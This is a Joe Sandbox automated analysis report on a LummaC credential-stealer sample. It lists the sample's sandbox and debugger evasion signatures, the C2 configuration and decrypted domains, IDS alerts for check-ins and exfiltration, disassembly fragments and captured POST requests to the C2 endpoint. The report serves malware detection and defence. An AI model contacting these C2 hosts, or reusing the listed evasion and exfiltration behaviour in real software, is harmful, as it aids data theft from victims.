Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random(3).exe

Overview

General Information

Sample name:random(3).exe
Analysis ID:1629896
MD5:8d0cbd77e8d4828aa0df4bb88339f6ac
SHA1:bf2ba197991b59779d1215188ff56deb9b151751
SHA256:665aee3342bfb1b567acb0d3a130b55bd9dac6ffa01e669f410c3d6c47440b38
Tags:176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • random(3).exe (PID: 7468 cmdline: "C:\Users\user\Desktop\random(3).exe" MD5: 8D0CBD77E8D4828AA0DF4BB88339F6AC)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:49.071576+010020283713Unknown Traffic192.168.2.449731104.21.31.208443TCP
      2025-03-05T09:16:49.825660+010020283713Unknown Traffic192.168.2.449732104.21.31.208443TCP
      2025-03-05T09:16:51.093749+010020283713Unknown Traffic192.168.2.449733104.21.31.208443TCP
      2025-03-05T09:16:51.795991+010020283713Unknown Traffic192.168.2.449734104.21.31.208443TCP
      2025-03-05T09:16:52.438897+010020283713Unknown Traffic192.168.2.449735104.21.31.208443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:49.253351+010020546531A Network Trojan was detected192.168.2.449731104.21.31.208443TCP
      2025-03-05T09:16:49.961907+010020546531A Network Trojan was detected192.168.2.449732104.21.31.208443TCP
      2025-03-05T09:16:56.996140+010020546531A Network Trojan was detected192.168.2.449735104.21.31.208443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:49.253351+010020498361A Network Trojan was detected192.168.2.449731104.21.31.208443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:49.071576+010020605371Domain Observed Used for C2 Detected192.168.2.449731104.21.31.208443TCP
      2025-03-05T09:16:49.825660+010020605371Domain Observed Used for C2 Detected192.168.2.449732104.21.31.208443TCP
      2025-03-05T09:16:51.093749+010020605371Domain Observed Used for C2 Detected192.168.2.449733104.21.31.208443TCP
      2025-03-05T09:16:51.795991+010020605371Domain Observed Used for C2 Detected192.168.2.449734104.21.31.208443TCP
      2025-03-05T09:16:52.438897+010020605371Domain Observed Used for C2 Detected192.168.2.449735104.21.31.208443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:48.563335+010020605361Domain Observed Used for C2 Detected192.168.2.4561731.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:48.550726+010020605381Domain Observed Used for C2 Detected192.168.2.4566471.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-05T09:16:51.907434+010020480941Malware Command and Control Activity Detected192.168.2.449734104.21.31.208443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: random(3).exeAvira: detected
      Found malware configuration
      Source: random(3).exe.7468.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://explorebieology.run/api", "Build Version": "1vJIvk--mix"}
      Multi AV Scanner detection for submitted file
      Source: random(3).exeReversingLabs: Detection: 52%
      Source: random(3).exeVirustotal: Detection: 58%Perma Link
      Joe Sandbox ML detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: gadgethgfub.icu
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: explorebieology.run
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: moderzysics.top
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: techmindzs.live
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: codxefusion.top
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: phygcsforum.life
      Source: 00000000.00000002.1881912769.00000000007F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: techspherxe.top
      Source: random(3).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.31.208:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h0_2_0083A030
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh]0_2_00803183
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h0_2_0083C1C6
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h0_2_00836170
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-62h]0_2_008212E0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h0_2_0083E420
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]0_2_0083E550
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov ebp, edx0_2_0083E550
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh]0_2_0083F630
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0083F630
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0080284C
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0080284C
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]0_2_0080284C
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]0_2_0083F870
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0083F870
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h]0_2_007FFAE9
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]0_2_0083FBA0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], al0_2_00827B25
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00827B25
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]0_2_00828C5C
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h0_2_008370E0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]0_2_008370E0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h0_2_0082500F
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_00838032
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0080B040
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx eax, byte ptr [edx+esi-444800C2h]0_2_00820042
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00829063
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], al0_2_008281B4
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_008281B4
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80A4h]0_2_00811160
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h0_2_00811160
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], CA198B66h0_2_00811160
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h0_2_0081A2B0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], al0_2_00812E97
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], al0_2_00812E97
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_007FA220
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_007FA220
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]0_2_0080D25F
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]0_2_0080C74B
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_00813382
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then push 00000000h0_2_0082039F
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_008243D0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov edx, dword ptr [ebp-24h]0_2_00823343
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx esi, byte ptr [ebx+edx]0_2_00823343
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00833350
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h0_2_0080D361
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_00816370
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00829404
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00825430
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h0_2_0083A580
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov edx, dword ptr [ebp-24h]0_2_00823680
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx esi, byte ptr [ebx+edx]0_2_00823680
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_0083B6F3
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then jmp ecx0_2_008246F0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h0_2_008246F0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h]0_2_008246F0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov ecx, dword ptr [00848390h]0_2_008037A2
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-06E9A8FEh]0_2_008107F0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [edx], al0_2_008277FA
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]0_2_0080C74B
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movsx esi, byte ptr [ebx+eax]0_2_0083D750
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [edx+esi]0_2_0083D750
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]0_2_0083D750
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]0_2_00821760
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then jmp eax0_2_00821760
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h0_2_00821760
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-1Ah]0_2_0083B88A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [edx], al0_2_00827899
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_008388E3
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h]0_2_008208F0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h0_2_008208F0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], al0_2_008128F8
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [edx], al0_2_0082783A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_0083A980
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_0083A980
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h0_2_0080D91E
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then jmp ecx0_2_00824948
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov word ptr [ebp+00h], cx0_2_0081A950
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_00826AF0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movsx esi, byte ptr [ebx+eax]0_2_0083DAF0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [edx+esi]0_2_0083DAF0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]0_2_0083DAF0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h0_2_0083EA10
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]0_2_00837A40
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00819CE0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00802CEC
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]0_2_00802CEC
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov dword ptr [esp+2Ch], ebx0_2_00800C50
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh0_2_0083ED50
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ebp, word ptr [ecx]0_2_0083ED50
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]0_2_0083FD60
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00829E9A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00829E9A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov dword ptr [esp], edx0_2_00812EFA
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx]0_2_007FBEA0
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov word ptr [eax], cx0_2_00823E60
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00828F82
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00828F82
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00828F93
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00828F93
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]0_2_0083DF90
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov esi, eax0_2_0080BFAA
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [ecx], dl0_2_0080DF2A
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00828F44
      Source: C:\Users\user\Desktop\random(3).exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00828F44

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2060538 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) : 192.168.2.4:56647 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2060536 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) : 192.168.2.4:56173 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49733 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49734 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49735 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2060537 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) : 192.168.2.4:49732 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.31.208:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: https://explorebieology.run/api
      Source: Joe Sandbox ViewIP Address: 104.21.31.208 104.21.31.208
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.31.208:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.31.208:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: explorebieology.run
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: explorebieology.run
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R8O1JPR0WPW2Q00M2ICookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2603Host: explorebieology.run
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OK0048YRWNYO4Q3GTCookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1090Host: explorebieology.run
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: explorebieology.run
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: gadgethgfub.icu
      Source: global trafficDNS traffic detected: DNS query: explorebieology.run
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: explorebieology.run
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 91b82c637e5b4340-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQfy1LdxvUTyiUbDp2E9z0V9d31ShChakR%2F1Le9oK0po3aR7NOJyAkXtXDWQoI9iv2k%2FPcLvKRp%2FFzCucfDMQUIP%2Bosw4tXskrnDP%2BPX4ANQRZ%2FFRrHZVhmO5N8oRdU%2FDQ1nOCBm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c67e9574b06-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0trmLZJ6HKorLNrdY1BcLIZ%2FtlS%2F%2Fqb5xOZaWhxCCGkwF8UB4p3zcJ8tm0%2FXhR9qTPX5QriTTU6t0%2F73OWiuMuuE0p5qbtOUoOGMC7WeJTy06jbPOkeF%2FPcIL1nQXh4ES2j56eQd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c6fab2bb2c0-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BiPaux6v1b0HNb3qxYmezt31JHTj2qTdQCHn0pN%2FPJjdTU83j7PioS%2F4SX864GXakme67138nOwjn0BuVMu3RwTjVaEfruJ7zpZQl30fUZ4Hme2Zq5OVLLDItUtT8riwY3809Z%2F6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c741ac37a99-EWR
      Source: random(3).exe, 00000000.00000002.1882716747.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/
      Source: random(3).exe, 00000000.00000002.1882716747.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1793215658.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000002.1882716747.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000002.1882716747.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/api
      Source: random(3).exe, 00000000.00000002.1882716747.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explorebieology.run/api/
